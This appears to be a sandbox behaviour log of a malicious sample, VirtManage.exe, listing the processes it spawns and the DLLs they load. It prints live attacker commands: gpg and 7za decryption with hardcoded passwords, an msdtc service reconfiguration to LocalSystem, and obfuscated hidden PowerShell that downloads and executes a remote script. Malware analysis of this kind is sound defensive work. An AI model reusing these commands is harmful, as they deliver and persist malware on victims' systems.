Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpg
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"
Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe "C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i "C:\ProgramData\Microsoft\WindowsUpdate24\RVTools.msi"Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.comJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpgJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demandJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config msdtc obj= "LocalSystem"Jump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeProcess created: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding FB5755C4D12C2C80E27834E9FC6EF971 CJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.comJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP"
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: dui70.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: duser.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: chartv.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: riched20.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: usp10.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msls31.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dispex.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeSection loaded: profapi.dllJump to behavior
